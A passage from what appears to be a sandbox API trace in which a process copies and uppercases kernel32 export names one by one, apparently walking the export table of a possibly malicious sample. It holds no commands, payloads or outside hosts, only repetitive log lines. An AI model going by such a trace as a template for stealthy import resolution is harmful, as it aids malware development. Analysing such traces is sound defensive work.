lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.889] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.889] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.889] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.889] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.889] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.889] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.889] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.889] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.889] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.889] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.889] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.890] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.890] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.890] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.890] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.890] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.890] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.890] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.890] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.890] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.890] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.890] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.890] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.890] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.890] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.890] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.890] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.890] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.890] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.890] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.890] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.891] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.891] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.891] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.891] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.891] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.891] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.891] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.891] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.891] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.891] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.891] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.891] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.891] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.891] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.891] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.891] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.891] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.891] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.891] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.891] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.892] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.892] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.892] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.892] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.892] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.892] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.892] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.892] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.892] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.892] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.892] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.892] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.892] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.892] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.892] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.892] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.892] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.892] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.892] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.893] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.893] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.893] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.893] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.893] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.893] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.893] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.893] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.893] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.893] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.893] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.893] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.893] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.893] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.893] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.893] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.893] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.893] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.893] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.893] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.894] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.894] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.894] lstrlenA (lpString="DELETEATOM") returned 10 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.894] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.894] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.894] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.894] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.894] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.894] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.894] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.894] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.894] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.894] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.894] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.894] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.894] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.894] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.894] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.894] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.895] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.895] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.895] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.895] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.895] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.895] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.895] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.895] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.895] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.895] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.895] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.895] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.895] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.895] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.895] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.895] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.895] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.895] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.895] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.895] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.896] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.896] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.896] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.896] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.896] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.896] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.896] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.896] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.896] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.896] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") 